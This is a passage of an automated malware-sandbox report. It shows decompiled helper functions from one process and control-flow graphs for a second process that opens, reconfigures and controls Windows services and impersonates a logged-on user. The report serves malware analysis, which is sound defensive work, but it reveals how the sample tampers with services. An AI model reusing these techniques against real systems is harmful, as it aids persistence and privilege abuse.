                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00de651f
                                                                                                                                                                                                        0x00de652a
                                                                                                                                                                                                        0x00de6534
                                                                                                                                                                                                        0x00de656b
                                                                                                                                                                                                        0x00de6577
                                                                                                                                                                                                        0x00de657c
                                                                                                                                                                                                        0x00de6536
                                                                                                                                                                                                        0x00de653e
                                                                                                                                                                                                        0x00de6542
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6544
                                                                                                                                                                                                        0x00de6547
                                                                                                                                                                                                        0x00de654c
                                                                                                                                                                                                        0x00de6549
                                                                                                                                                                                                        0x00de6549
                                                                                                                                                                                                        0x00de6549
                                                                                                                                                                                                        0x00de655e
                                                                                                                                                                                                        0x00de6560
                                                                                                                                                                                                        0x00de6569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6569
                                                                                                                                                                                                        0x00de6542
                                                                                                                                                                                                        0x00de6587

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00DE0000,000007D6,00000005), ref: 00DE652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00DE0000,00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DE6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00DE0000,00000000,00000547,00DE19E0,00000000), ref: 00DE6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DE6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: f640ee5c895556ac150be4c2047d7fbc55e2cb39bc1271e784f3cda04de29543
                                                                                                                                                                                                        • Instruction ID: 70956620bb9615e87b6ee85b9fc1719dd211e383cf85bc176a48624566290c22
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f640ee5c895556ac150be4c2047d7fbc55e2cb39bc1271e784f3cda04de29543
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6012B72200386BBCB107F5A9C48DBB766CEB953A1F050125FE01D7254D771DD1086B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00DE65E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x00de65e8
                                                                                                                                                                                                        0x00de65ed
                                                                                                                                                                                                        0x00de65ef
                                                                                                                                                                                                        0x00de65f2
                                                                                                                                                                                                        0x00de65f4
                                                                                                                                                                                                        0x00de65f4
                                                                                                                                                                                                        0x00de65f6
                                                                                                                                                                                                        0x00de65f7
                                                                                                                                                                                                        0x00de6608
                                                                                                                                                                                                        0x00de6611
                                                                                                                                                                                                        0x00de6618
                                                                                                                                                                                                        0x00de661c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de660e
                                                                                                                                                                                                        0x00de6623
                                                                                                                                                                                                        0x00de6625
                                                                                                                                                                                                        0x00de663b
                                                                                                                                                                                                        0x00de663b
                                                                                                                                                                                                        0x00de663d
                                                                                                                                                                                                        0x00de6641
                                                                                                                                                                                                        0x00de6610
                                                                                                                                                                                                        0x00de6610
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6610
                                                                                                                                                                                                        0x00de6644
                                                                                                                                                                                                        0x00de6647
                                                                                                                                                                                                        0x00de6647
                                                                                                                                                                                                        0x00de6621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00DE2B33), ref: 00DE6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00DE6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00DE6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00DE6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: d4d44e5f4ab286bd7f3978412d62e32403616c4c2754aa869370cc9518f6c03e
                                                                                                                                                                                                        • Instruction ID: 1ef5ee99597cd3d9b9d27b2969772dbd0ff3836e1ad1c50779f6794b781ce4ac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4d44e5f4ab286bd7f3978412d62e32403616c4c2754aa869370cc9518f6c03e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5F0F4320042D16EE7323B2A8CC89BBAF9CDBA7294B2D41EFE495C6101D6158D068671
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE69B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0xde81f8 = E00DE6C70();
                                                                                                                                                                                                        				__set_app_type(E00DE6FBE(2));
                                                                                                                                                                                                        				 *0xde88a4 =  *0xde88a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0xde88a8 =  *0xde88a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0xde8528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0xde851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E00DE7000();
                                                                                                                                                                                                        				if( *0xde8000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E00DE7000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE71EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00de69b7
                                                                                                                                                                                                        0x00de69c2
                                                                                                                                                                                                        0x00de69c8
                                                                                                                                                                                                        0x00de69cf
                                                                                                                                                                                                        0x00de69d8
                                                                                                                                                                                                        0x00de69de
                                                                                                                                                                                                        0x00de69e4
                                                                                                                                                                                                        0x00de69e6
                                                                                                                                                                                                        0x00de69ec
                                                                                                                                                                                                        0x00de69f2
                                                                                                                                                                                                        0x00de69f4
                                                                                                                                                                                                        0x00de6a00
                                                                                                                                                                                                        0x00de6a07
                                                                                                                                                                                                        0x00de6a0d
                                                                                                                                                                                                        0x00de6a0e
                                                                                                                                                                                                        0x00de6a15

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00DE6FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00DE69C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00DE69D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00DE69E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00DE6A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: d9fbc232723e3ba1eac306301d09f0a1f8631d2ace0f74bd4acc3afc7e85f392
                                                                                                                                                                                                        • Instruction ID: 44ae93f8b5c45b52a25f403ac952fd1ae39bf1260b18336c6e473fecef3dfe35
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9fbc232723e3ba1eac306301d09f0a1f8631d2ace0f74bd4acc3afc7e85f392
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F0F8705083C28FC794BB35FD8A6083B62FB04321B101A19E565EE3E0CF3A95449A35
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 17 7ff815f01b10-7ff815f01b17 18 7ff815f01b22-7ff815f01bd8 17->18 19 7ff815f01b19-7ff815f01b21 17->19 24 7ff815f01c36-7ff815f01c68 18->24 25 7ff815f01bda-7ff815f01be9 18->25 19->18 32 7ff815f01cc7-7ff815f01d00 24->32 33 7ff815f01c6a-7ff815f01c7a 24->33 25->24 26 7ff815f01beb-7ff815f01bee 25->26 27 7ff815f01bf0-7ff815f01c03 26->27 28 7ff815f01c28-7ff815f01c30 26->28 30 7ff815f01c07-7ff815f01c1a 27->30 31 7ff815f01c05 27->31 28->24 30->30 34 7ff815f01c1c-7ff815f01c24 30->34 31->30 39 7ff815f01d02-7ff815f01d11 32->39 40 7ff815f01d5e-7ff815f01d97 32->40 33->32 35 7ff815f01c7c-7ff815f01c7f 33->35 34->28 37 7ff815f01c81-7ff815f01c94 35->37 38 7ff815f01cb9-7ff815f01cc1 35->38 41 7ff815f01c96 37->41 42 7ff815f01c98-7ff815f01cab 37->42 38->32 39->40 43 7ff815f01d13-7ff815f01d16 39->43 50 7ff815f01df6-7ff815f01e2f 40->50 51 7ff815f01d99-7ff815f01da9 40->51 41->42 42->42 44 7ff815f01cad-7ff815f01cb5 42->44 45 7ff815f01d50-7ff815f01d58 43->45 46 7ff815f01d18-7ff815f01d2b 43->46 44->38 45->40 48 7ff815f01d2f-7ff815f01d42 46->48 49 7ff815f01d2d 46->49 48->48 52 7ff815f01d44-7ff815f01d4c 48->52 49->48 59 7ff815f01e31-7ff815f01e41 50->59 60 7ff815f01e8e-7ff815f01ec7 50->60 51->50 53 7ff815f01dab-7ff815f01dae 51->53 52->45 54 7ff815f01db0-7ff815f01dc3 53->54 55 7ff815f01de8-7ff815f01df0 53->55 57 7ff815f01dc7-7ff815f01dda 54->57 58 7ff815f01dc5 54->58 55->50 57->57 61 7ff815f01ddc-7ff815f01de4 57->61 58->57 59->60 62 7ff815f01e43-7ff815f01e46 59->62 66 7ff815f01f26-7ff815f01fe2 ChangeServiceConfigA 60->66 67 7ff815f01ec9-7ff815f01ed9 60->67 61->55 64 7ff815f01e80-7ff815f01e88 62->64 65 7ff815f01e48-7ff815f01e5b 62->65 64->60 68 7ff815f01e5f-7ff815f01e72 65->68 69 7ff815f01e5d 65->69 77 7ff815f01fe4 66->77 78 7ff815f01fea-7ff815f01ffc call 7ff815f02049 66->78 67->66 70 7ff815f01edb-7ff815f01ede 67->70 68->68 71 7ff815f01e74-7ff815f01e7c 68->71 69->68 72 7ff815f01ee0-7ff815f01ef3 70->72 73 7ff815f01f18-7ff815f01f20 70->73 71->64 75 7ff815f01ef7-7ff815f01f0a 72->75 76 7ff815f01ef5 72->76 73->66 75->75 79 7ff815f01f0c-7ff815f01f14 75->79 76->75 77->78 81 7ff815f02001-7ff815f0202d 78->81 79->73 83 7ff815f02034-7ff815f02048 81->83 84 7ff815f0202f 81->84 84->83
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeConfigService
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3849694230-0
                                                                                                                                                                                                        • Opcode ID: 992f51d5263f4bf4f67eb183168a82a2ecdb06fc34f93b2ecb0037ac4b32ede9
                                                                                                                                                                                                        • Instruction ID: b07486c8bd48f10d0a9ea9051eb6badfa5c4ad8a0d49dd55fbb7f7b247cb92d7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 992f51d5263f4bf4f67eb183168a82a2ecdb06fc34f93b2ecb0037ac4b32ede9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15F1C030918E4D4BEB68EF28CC46BF977D1FB58750F14422AE84EC7691DF74A5818B82
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                                                                                        • Opcode ID: cc20fecf85475e68b93b222b206d114e519c7c9a1b21e6890d47dcbd0c1c0b84
                                                                                                                                                                                                        • Instruction ID: 393ebf5e70a3b4ead2043f95c79cc363a898a2346eed4166879e1867e02b7ec1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc20fecf85475e68b93b222b206d114e519c7c9a1b21e6890d47dcbd0c1c0b84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E916D30618A4D8FEB68EF18C8597EA77D1FB54350F44427AD84ECB692CF74A485CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 120 7ff815f00c34-7ff815f00c3b 121 7ff815f00c46-7ff815f00ce5 120->121 122 7ff815f00c3d-7ff815f00c45 120->122 127 7ff815f00ce7-7ff815f00cf6 121->127 128 7ff815f00d40-7ff815f00daa OpenServiceA 121->128 122->121 127->128 129 7ff815f00cf8-7ff815f00cfb 127->129 133 7ff815f00db2-7ff815f00de6 call 7ff815f00e02 128->133 134 7ff815f00dac 128->134 131 7ff815f00d35-7ff815f00d3d 129->131 132 7ff815f00cfd-7ff815f00d10 129->132 131->128 135 7ff815f00d14-7ff815f00d27 132->135 136 7ff815f00d12 132->136 141 7ff815f00ded-7ff815f00e01 133->141 142 7ff815f00de8 133->142 134->133 135->135 138 7ff815f00d29-7ff815f00d31 135->138 136->135 138->131 142->141
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenService
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3098006287-0
                                                                                                                                                                                                        • Opcode ID: 788ba9fba5163b7a1c390569d94a0405851014eabda2c76bd8738e5597b41c04
                                                                                                                                                                                                        • Instruction ID: 2f5ba0369465ceb8f4a2968bc500212408c9e98b57a2ca4af8205ddc180317f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 788ba9fba5163b7a1c390569d94a0405851014eabda2c76bd8738e5597b41c04
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8351A130518A4D4FEB58EE28C84A7B977D1FB59360F14422AE84DC7692DF74A842CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 143 7ff815f00148-7ff815f00ce5 149 7ff815f00ce7-7ff815f00cf6 143->149 150 7ff815f00d40-7ff815f00daa OpenServiceA 143->150 149->150 151 7ff815f00cf8-7ff815f00cfb 149->151 155 7ff815f00db2-7ff815f00de6 call 7ff815f00e02 150->155 156 7ff815f00dac 150->156 153 7ff815f00d35-7ff815f00d3d 151->153 154 7ff815f00cfd-7ff815f00d10 151->154 153->150 157 7ff815f00d14-7ff815f00d27 154->157 158 7ff815f00d12 154->158 163 7ff815f00ded-7ff815f00e01 155->163 164 7ff815f00de8 155->164 156->155 157->157 160 7ff815f00d29-7ff815f00d31 157->160 158->157 160->153 164->163
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6eca6dc8f6c196a7c3b0e65479516ab26f9613b76626b8253dd8917474214e11
                                                                                                                                                                                                        • Instruction ID: 2b96b094cbc939decce7d5fdd95816f8bc75406b33feec958551b72bd4b100be
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6eca6dc8f6c196a7c3b0e65479516ab26f9613b76626b8253dd8917474214e11
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6951A230918A4D8FEB58EE18D84A7B937D1FB58351F14423EE84EC7692DF74A842CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 165 7ff815f00b2d-7ff815f00bb8 169 7ff815f00bc2-7ff815f00bc7 165->169 170 7ff815f00bba-7ff815f00bbf 165->170 171 7ff815f00bd1-7ff815f00c08 OpenSCManagerW 169->171 172 7ff815f00bc9-7ff815f00bce 169->172 170->169 173 7ff815f00c10-7ff815f00c2d 171->173 174 7ff815f00c0a 171->174 172->171 174->173
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1889721586-0
                                                                                                                                                                                                        • Opcode ID: aefa254ff430ad7950412bf2bd4791b72ea36ae2b0fe98978158ca649d4d10c4
                                                                                                                                                                                                        • Instruction ID: bcde0c47ef86c23e495dd71f79ee713312fc29c4b79708b3f5a83b387e20fd18
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aefa254ff430ad7950412bf2bd4791b72ea36ae2b0fe98978158ca649d4d10c4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1431B271908A188FDB28DF98D849AFABBF0EB65321F04422FD04ED7652DF70A445CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 175 7ff815f01a1d-7ff815f01a25 176 7ff815f01a27 175->176 177 7ff815f01a28-7ff815f01ad9 ControlService 175->177 176->177 180 7ff815f01ae1-7ff815f01b09 177->180 181 7ff815f01adb 177->181 181->180
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ControlService
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 253159669-0
                                                                                                                                                                                                        • Opcode ID: 9debad52a01a2a8e1884b03bd2f9af5ac5d497af8f88689a44e1fd2de570f37c
                                                                                                                                                                                                        • Instruction ID: 00eddfe7a56b5649dc5012c45a300c4cac071326d94c71b659ad2bda048a64e6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9debad52a01a2a8e1884b03bd2f9af5ac5d497af8f88689a44e1fd2de570f37c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F31D53190CA588FDB18EB9CD845AF97BE0EB65721F04017EE08AD3652CB64A446CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 182 7ff815f0108a-7ff815f010b3 183 7ff815f010b5-7ff815f010bd 182->183 184 7ff815f010be-7ff815f01152 FindCloseChangeNotification 182->184 183->184 187 7ff815f01154 184->187 188 7ff815f0115a-7ff815f01181 184->188 187->188
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: e6ccbe5d5903f0d1d81d8a5d51772360dc71ae1b4d9bebc33fefc303dfb11cf0
                                                                                                                                                                                                        • Instruction ID: 44029ed13860f7534ec7b0713bc8fc677505830a93075a80b65dc18f4da0cff5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6ccbe5d5903f0d1d81d8a5d51772360dc71ae1b4d9bebc33fefc303dfb11cf0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931E63190CA889FDB0ADB688C05BE97FF0EF56320F0442AFD089C75A2DA696456CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 189 7ff815f01760-7ff815f01767 190 7ff815f01772-7ff815f017c5 189->190 191 7ff815f01769-7ff815f01771 189->191 193 7ff815f017cd-7ff815f01802 ImpersonateLoggedOnUser 190->193 191->190 194 7ff815f01804 193->194 195 7ff815f0180a-7ff815f01831 193->195 194->195
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2216092060-0
                                                                                                                                                                                                        • Opcode ID: fdb1ceb632895f2ec363503071cbd1049a222ebea5d83eaee7069884a7a4258e
                                                                                                                                                                                                        • Instruction ID: 4ca4907d0a1374173286ec1f90bda7f62b08ba24250058a9fbc306f6047d4717
